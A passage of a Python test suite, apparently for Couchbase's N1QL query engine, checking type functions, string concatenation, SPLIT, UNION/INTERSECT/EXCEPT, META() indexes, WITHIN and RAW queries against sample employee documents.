" millis_to_str(str_to_millis(tostr(join_yr) || '-0' ||" + \
" tostr(join_mo) || '-0' || tostr(join_day))) as date from %s" % query_bucket + \
" where join_mo < 10 and join_day < 10 ORDER BY date %s" % order
actual_result = self.run_cbq_query()
actual_result = ([{"date": doc["date"][:10],
"join_yr": doc['join_yr'],
"join_mo": doc['join_mo'],
"join_day": doc['join_day']} for doc in actual_result["results"]])
expected_result = [{"date": '%s-0%s-0%s' % (doc['join_yr'],
doc['join_mo'], doc['join_day']),
"join_yr": doc['join_yr'],
"join_mo": doc['join_mo'],
"join_day": doc['join_day']}
for doc in self.full_list
if doc['join_mo'] < 10 and doc['join_day'] < 10]
expected_result = sorted(expected_result, key=lambda doc: (doc['date']), reverse=(order == 'desc'))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# TYPE FNS
##############################################################################################
def test_type(self):
self.fail_if_no_buckets()
types_list = [("name", "string"), ("tasks_points", "object"),
("some_wrong_key", "missing"),
("skills", "array"), ("VMs[0].RAM", "number"),
("true", "boolean"), ("test_rate", "number"),
("test.test[0]", "missing")]
for query_bucket in self.query_buckets:
for name_item, type_item in types_list:
self.query = 'SELECT TYPENAME(%s) as type_output FROM %s' % (
name_item, query_bucket)
actual_result = self.run_cbq_query()
for doc in actual_result['results']:
self.assertTrue(doc["type_output"] == type_item,
"Expected type for %s: %s. Actual: %s" % (
name_item, type_item, doc["type_output"]))
self.log.info("Type for %s(%s) is checked." % (name_item, type_item))
def test_check_types(self):
self.fail_if_no_buckets()
types_list = [("name", "ISSTR", True), ("skills[0]", "ISSTR", True),
("test_rate", "ISSTR", False), ("VMs", "ISSTR", False),
("false", "ISBOOL", True), ("join_day", "ISBOOL", False),
("VMs", "ISARRAY", True), ("VMs[0]", "ISARRAY", False),
("skills[0]", "ISARRAY", False), ("skills", "ISARRAY", True)]
for query_bucket in self.query_buckets:
for name_item, fn, expected_result in types_list:
self.query = 'SELECT %s(%s) as type_output FROM %s' % (
fn, name_item, query_bucket)
actual_result = self.run_cbq_query()
for doc in actual_result['results']:
self.assertTrue(doc["type_output"] == expected_result,
"Expected output for fn %s( %s) : %s. Actual: %s" % (
fn, name_item, expected_result, doc["type_output"]))
self.log.info("Fn %s(%s) is checked. (%s)" % (fn, name_item, expected_result))
def test_types_in_satisfy(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES ISOBJ(vm) END) AND" + \
" ISSTR(email) ORDER BY name"
if self.analytics:
self.query = "SELECT name FROM %s d WHERE " % query_bucket + \
"(EVERY vm IN d.VMs SATISFIES ISOBJ(vm) ) AND" + \
" ISSTR(email) ORDER BY name"
actual_result = self.run_cbq_query()
expected_result = [{"name": doc['name']}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['name']))
self._verify_results(actual_result['results'], expected_result)
def test_to_num(self):
self.query = 'SELECT tonum("12.12") - tonum("0.12") as num'
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'][0]['num'] == 12,
"Expected: 12. Actual: %s" % (actual_result['results']))
self.log.info("TONUM is checked")
def test_to_str(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT TOSTR(join_mo) month FROM %s" % query_bucket
actual_result = self.run_cbq_query()
actual_result = actual_result['results']
self.query = "SELECT REVERSE(TOSTR(join_mo)) rev_month FROM %s" % query_bucket
actual_result1 = self.run_cbq_query()
actual_result2 = actual_result1['results']
expected_result = [{"month": str(doc['join_mo'])} for doc in self.full_list]
expected_result2 = [{"rev_month": str(doc['join_mo'])[::-1]} for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result2, expected_result2)
def test_to_bool(self):
self.query = 'SELECT tobool("true") as boo'
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['results'][0]['boo'],
"Expected: true. Actual: %s" % (actual_result['results']))
self.log.info("TOBOOL is checked")
# Test has no usages anywhere
def test_to_array(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT job_title, toarray(name) as names" + \
" FROM %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = sorted(actual_list['results'], key=lambda doc: (doc['job_title'],
doc['names']))
expected_result = [{"job_title": doc["job_title"],
"names": [doc["name"]]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['job_title'],
doc['names']))
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# CONCATENATION
##############################################################################################
def test_concatenation(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT name || \" \" || job_title as employee" + \
" FROM %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = sorted(actual_list['results'], key=lambda doc: (doc['employee']))
expected_result = [{"employee": doc["name"] + " " + doc["job_title"]}
for doc in self.full_list]
expected_result = sorted(expected_result, key=lambda doc: (doc['employee']))
self._verify_results(actual_result, expected_result)
def test_concatenation_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name, skills' + \
' FROM %s WHERE skills[0]=("skill" || "2010")' % query_bucket
actual_list = self.run_cbq_query()
self.query = 'SELECT name, skills' + \
' FROM %s WHERE reverse(skills[0])=("0102" || "lliks")' % query_bucket
actual_list1 = self.run_cbq_query()
actual_result = actual_list['results']
actual_result2 = actual_list1['results']
expected_result = [{"name": doc["name"], "skills": doc["skills"]}
for doc in self.full_list
if doc["skills"][0] == 'skill2010']
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result, actual_result2)
##############################################################################################
#
# SPLIT
##############################################################################################
def test_select_split_fn(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "SELECT SPLIT(email, '@')[0] as login" + \
" FROM %s" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"login": doc["email"].split('@')[0]}
for doc in self.full_list]
self._verify_results(actual_result, expected_result)
def test_split_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'SELECT name FROM %s' % query_bucket + \
' WHERE SPLIT(email, \'-\')[0] = SPLIT(name, \'-\')[1]'
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list
if doc["email"].split('-')[0] == doc["name"].split('-')[1]]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# UNION
##############################################################################################
def test_union(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name from %s union select email from %s" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_prepared_union(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name from %s union select email from %s" % (query_bucket, query_bucket)
self.prepared_common_body()
def test_union_multiply_buckets(self):
self.assertTrue(len(self.buckets) > 1, 'This test needs more than one bucket')
self.query = "select name from %s union select email from %s" % (self.buckets[0].name, self.buckets[1].name)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_union_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name from %s union all select email from %s" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
self._verify_results(actual_result, expected_result)
def test_union_all_multiply_buckets(self):
self.assertTrue(len(self.buckets) > 1, 'This test needs more than one bucket')
self.query = "select name from %s union all select email from %s" % (self.query_buckets[0],
self.query_buckets[1])
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list])
self._verify_results(actual_result, expected_result)
def test_union_where(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s union select email from %s where join_mo > 2" % (query_bucket,
query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list]
expected_result.extend([{"email": doc["email"]}
for doc in self.full_list if doc["join_mo"] > 2])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_union_where_covering(self):
created_indexes = []
ind_list = ["one", "two"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "coveringindex{0}".format(ind)
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(name, email, join_mo) USING {2}".format(index_name, query_bucket,
self.index_type)
elif ind == "two":
self.query = "CREATE INDEX {0} ON {1}(email, join_mo) USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket in self.query_buckets:
self.query = "explain select name from {0} where name is not null union select email from {0} where email " \
"is not null and join_mo >2 ".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select name from {0} where name is not null union select email from {0} where email is not " \
"null and join_mo >2".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]} for doc in self.full_list]
expected_result.extend([{"email": doc["email"]} for doc in self.full_list if doc["join_mo"] > 2])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
for index_name in created_indexes:
try:
self.query = "DROP INDEX {0} ON {1} USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
except Exception as e:
self.log.error("Drop index failed {0}".format(str(e)))
self.query = "CREATE PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
self.sleep(15, 'wait for index')
self.query = "select name from {0} where name is not null union select email from {0} where email is not " \
"null and join_mo >2".format(query_bucket)
result = self.run_cbq_query()
diffs = DeepDiff(actual_result, result['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
#self.assertEqual(actual_result, sorted(result['results']))
self.query = "DROP PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
def test_union_aggr_fns(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select count(name) as names from %s union select count(email) as " \
"emails from %s" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"names": len(self.full_list)}]
expected_result.extend([{"emails": len(self.full_list)}])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_union_aggr_fns_covering(self):
created_indexes = []
ind_list = ["one", "two"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "coveringindex%s" % ind
if ind == "one":
self.query = "CREATE INDEX %s ON %s(name, email, join_day) USING %s" % (index_name,
query_bucket,
self.index_type)
elif ind == "two":
self.query = "CREATE INDEX %s ON %s(email) USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket in self.query_buckets:
self.query = "explain select count(name) as names from %s where join_day is not null union select count(" \
"email) as emails from %s where email is not null" % (query_bucket, query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name)
self.query = "select count(name) as names from %s where join_day is not null union select count(email) " \
" as emails from %s where email is not null" % (query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"names": len(self.full_list)}]
expected_result.extend([{"emails": len(self.full_list)}])
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self.sleep(15, 'wait for index')
self.query = "select count(name) as names from %s where join_day is not null union select count(email) " \
" as emails from %s where email is not null" % (
query_bucket, query_bucket)
result = self.run_cbq_query()
self.assertEqual(actual_result, sorted(result['results']))
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
# ############# META NEW ###################
def test_meta_basic(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "metaindex%s" % ind
if ind == "one":
self.query = "CREATE INDEX %s ON %s(meta().id,meta().cas) USING %s" % (
index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, meta().cas from {0} where meta().id is not null order by meta(" \
").id limit 10".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, meta().cas from {0} where meta().id is not null order by " \
"meta().id limit 10".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, meta().cas from {0} use index(`#primary`) where meta().id is not null " \
"order by meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_where(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "meta_where%s" % ind
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(meta().id,meta().cas) where meta().id like " \
"'query-testemployee6%' USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, meta().cas from {0} where meta().id like 'query-testemployee6%' " \
"order by meta().id limit 10".format(
query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, meta().cas from {0} where meta().id like 'query-testemployee6%' order by " \
"meta().id limit 10".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, meta().cas from {0} where meta().id like 'query-testemployee6%' order by " \
"meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_ambiguity(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "create index idx on %s(META())" % query_bucket
self.run_cbq_query()
self.query = "create index idx2 on {0}(META())".format(query_bucket)
self.run_cbq_query()
self.query = "SELECT META() as meta_c FROM %s ORDER BY meta_c limit 10" % query_bucket
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['status'] == "success")
self.query = "SELECT META(test) as meta_c FROM %s as test ORDER BY meta_c limit 10" % query_bucket
actual_result = self.run_cbq_query()
self.assertTrue(actual_result['status'] == "success")
self.query = "SELECT META(t1).id as id FROM " + self.query_buckets[0] + " t1 JOIN " + \
self.query_buckets[0] + " t2 ON KEYS t1.id;"
self.assertTrue(actual_result['status'] == "success")
self.query = "drop index idx ON %s" % query_bucket
self.run_cbq_query()
self.query = "drop index idx2 ON %s" % query_bucket
self.run_cbq_query()
def test_meta_where_greater_than(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "meta_where%s" % ind
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(meta().id,meta().cas) where meta().id >10 USING {2}".format(
index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, meta().cas from {0} where meta().id >10 order by meta().id".format(
query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, meta().cas from {0} where meta().id >10 order by meta().id limit 10".format(
query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, meta().cas from {0} use index(`#primary`) where meta().id > 10 order by " \
"meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_partial(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "meta_where%s" % ind
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(meta().id, name) where meta().id >10 USING {2}".format(
index_name, query_bucket, self.index_type)
# if self.gsi_type:
# self.query += "WITH {'index_type': 'memdb'}"
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select meta().id, name from {0} where meta().id >10 and name is not null order by " \
"meta().id limit 10".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name[0])
self.query = "select meta().id, name from {0} where meta().id >10 and name is not null order by " \
"meta().id limit 10".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
for index_name in created_indexes:
self.query = "DROP INDEX %s ON %s USING %s" % (index_name, query_bucket, self.index_type)
self.run_cbq_query()
self.covering_index = False
self.query = "CREATE PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select meta().id, name from {0} use index(`#primary`) where meta().id > 10 and name is not " \
"null order by meta().id limit 10".format(query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON %s" % query_bucket
self.run_cbq_query()
def test_meta_non_supported(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
for ind in ind_list:
index_name = "meta_cas_%s" % ind
if ind == "one":
queries_errors = {'CREATE INDEX ONE ON ' + self.query_buckets[0] + ' (meta().cas) using GSI': (
'syntax error', 3000),
'CREATE INDEX ONE ON ' + self.query_buckets[0] + ' (meta().flags) using GSI': (
'syntax error', 3000),
'CREATE INDEX ONE ON ' + self.query_buckets[
0] + ' (meta().expiration) using GSI': (
'syntax error', 3000),
'CREATE INDEX ONE ON ' + self.query_buckets[0] + ' (meta().cas) using VIEW': (
'syntax error', 3000)}
def test_meta_negative_namespace(self):
created_indexes = []
ind_list = ["one"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
for ind in ind_list:
index_name = "meta_cas_%s" % ind
if ind == "one":
queries_errors = {
'CREATE INDEX TWO ON ' + self.query_buckets[0] + ' (meta(invalid).id) using GSI': (
'syntax error', 3000),
'CREATE INDEX THREE ON ' + self.query_buckets[0] + ' (meta(invalid).id) using VIEW': (
'syntax error', 3000),
'CREATE INDEX FOUR ON ' + self.query_buckets[0] + ' (meta()) using GSI': ('syntax error', 3000),
'CREATE INDEX FIVE ON ' + self.query_buckets[0] + ' (meta()) using VIEW': (
'syntax error', 3000)}
self.negative_common_body(queries_errors)
# ####################### META NEW END ######################################
def test_intersect(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s intersect select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if doc['join_day'] > 5]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_intersect_covering(self):
created_indexes = []
ind_list = ["one", "two"]
index_name = "one"
self.fail_if_no_buckets()
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
for ind in ind_list:
index_name = "coveringindex{0}".format(ind)
if ind == "one":
self.query = "CREATE INDEX {0} ON {1}(job_title, name) USING {2}".format(index_name, query_bucket, self.index_type)
elif ind == "two":
self.query = "CREATE INDEX {0} ON {1}(join_day, name) USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
self._wait_for_index_online(bucket, index_name)
created_indexes.append(index_name)
for query_bucket, bucket in zip(self.query_buckets, self.buckets):
self.query = "explain select name from {0} where job_title='Engineer' intersect select name from {0} s where s.join_day>5".format(query_bucket)
if self.covering_index:
self.check_explain_covering_index(index_name)
self.query = "select name from {0} where job_title='Engineer' intersect select name from {0} s where s.join_day>5".format(query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if doc['join_day'] > 5]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
for ind in ind_list:
index_name = "coveringindex{0}".format(ind)
try:
self.query = "DROP INDEX {0} ON {1} USING {2}".format(index_name, query_bucket, self.index_type)
self.run_cbq_query()
except Exception as e:
self.log.error("Drop index failed {0}".format(str(e)))
self.query = "CREATE PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
self._wait_for_index_online(bucket, '#primary')
self.query = "select name from {0} where job_title='Engineer' intersect select name from {0} s where s.join_day>5".format(query_bucket, query_bucket)
expected_list = self.run_cbq_query()
diffs = DeepDiff(actual_result, expected_list['results'], ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "DROP PRIMARY INDEX ON {0}".format(query_bucket)
self.run_cbq_query()
def test_intersect_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s intersect all select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if doc['join_day'] > 5]
self._verify_results(actual_result, expected_result)
def test_prepared_intersect(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s intersect all select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
self.prepared_common_body()
def test_except_secondsetempty(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "drop primary index on %s USING %s" % (query_bucket, self.primary_indx_type)
self.run_cbq_query()
try:
self.query = "(select id keyspace_id from system:keyspaces) except (select indexes.keyspace_id from " \
"system:indexes) "
actual_list = self.run_cbq_query()
bucket_names = []
for bucket in self.buckets:
bucket_names.append(bucket.name)
count = 0
for _ in self.query_buckets:
if actual_list['results'][count]['keyspace_id'] in bucket_names:
count += 1
else:
self.log.error("Wrong keyspace id returned or empty keyspace id returned")
finally:
for query_bucket in self.query_buckets:
self.query = "create primary index on %s" % query_bucket
self.run_cbq_query()
def test_except(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s except select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if not doc['join_day'] > 5]
expected_result = [dict(y) for y in set(tuple(x.items()) for x in expected_result)]
self._verify_results(actual_result, expected_result)
def test_except_all(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name from %s except all select name from %s s where s.join_day>5" % (
query_bucket, query_bucket)
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"]}
for doc in self.full_list if not doc['join_day'] > 5]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# WITHIN
##############################################################################################
def test_within_list_object(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, VMs from %s WHERE 5 WITHIN VMs" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "VMs": doc["VMs"]}
for doc in self.full_list
if len([vm for vm in doc["VMs"] if vm["RAM"] == 5])]
self._verify_results(actual_result, expected_result)
def test_prepared_within_list_object(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
query_bucket = self.get_collection_name(query_bucket)
self.query = "select name, VMs from %s WHERE 5 WITHIN VMs" % query_bucket
self.prepared_common_body()
def test_within_list_of_lists(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, VMs from %s where name within [['employee-2', 'employee-4']," \
" ['employee-5']] " % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "VMs": doc["VMs"]}
for doc in self.full_list
if doc["name"] in ['employee-2', 'employee-4', 'employee-5']]
self._verify_results(actual_result, expected_result)
def test_within_object(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select name, tasks_points from %s WHERE 1 WITHIN tasks_points" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "tasks_points": doc["tasks_points"]}
for doc in self.full_list
if doc["tasks_points"]["task1"] == 1 or doc["tasks_points"]["task2"] == 1]
self._verify_results(actual_result, expected_result)
def test_within_array(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = " select name, skills from %s where 'skill2010' within skills" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [{"name": doc["name"], "skills": doc["skills"]}
for doc in self.full_list
if 'skill2010' in doc["skills"]]
self._verify_results(actual_result, expected_result)
##############################################################################################
#
# RAW
##############################################################################################
def test_raw(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select raw name from %s " % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
self.query = "select raw reverse(reverse(name)) from %s " % query_bucket
actual_list1 = self.run_cbq_query()
actual_result1 = actual_list1['results']
expected_result = [doc["name"] for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self._verify_results(actual_result, actual_result1)
def test_raw_limit(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select raw skills[0] from %s limit 5" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["skills"][0] for doc in self.full_list][:5]
self._verify_results(actual_result, expected_result)
def test_raw_order(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = "select raw name from {0} order by name {1}".format(query_bucket, "desc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["name"]
for doc in self.full_list]
diffs = DeepDiff(actual_result, expected_result, ignore_order=True)
if diffs:
self.assertTrue(False, diffs)
self.query = "select raw name from {0} order by name {1}".format(query_bucket, "asc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["name"] for doc in self.full_list]
self._verify_results(actual_result, expected_result)
self.query = "select raw meta().id from {0} order by meta().id {1}".format(query_bucket, "asc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = sorted(actual_result)
self.assertEqual(actual_result, expected_result)
self.query = "select raw meta().id from {0} order by meta().id {1}".format(query_bucket, "desc")
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = sorted(actual_result, reverse=True)
self.assertEqual(actual_result, expected_result)
def test_push_limit(self):
self.fail_if_no_buckets()
for query_bucket in self.query_buckets:
self.query = 'insert into %s(KEY, VALUE) VALUES ("f01", {"f1":"f1"})' % query_bucket
self.run_cbq_query()
self.query = 'insert into %s(KEY, VALUE) VALUES ("f02", {"f1":"f1","f2":"f2"})' % query_bucket
self.run_cbq_query()
self.query = 'create index if1 on %s(f1)' % query_bucket
self.query = 'select q.id, q.f1,q.f2 from (select meta().id, f1,f2 from %s where f1="f1") q where q.f2 = ' \
'"f2" limit 1' % query_bucket
result = self.run_cbq_query()
self.assertTrue(result['metrics']['resultCount'] == 1)
self.query = 'delete from %s use keys["f01","f02"]' % query_bucket
self.run_cbq_query()
##############################################################################################
#
# Number fns
##############################################################################################
# This test has no usages anywhere
def test_abs(self):
for query_bucket in self.query_buckets:
self.query = "select join_day from %s where join_day > abs(-10)" % query_bucket
actual_list = self.run_cbq_query()
actual_result = actual_list['results']
expected_result = [doc["join_day"] for doc in self.full_list
if doc["join_day"] > abs(-10)]
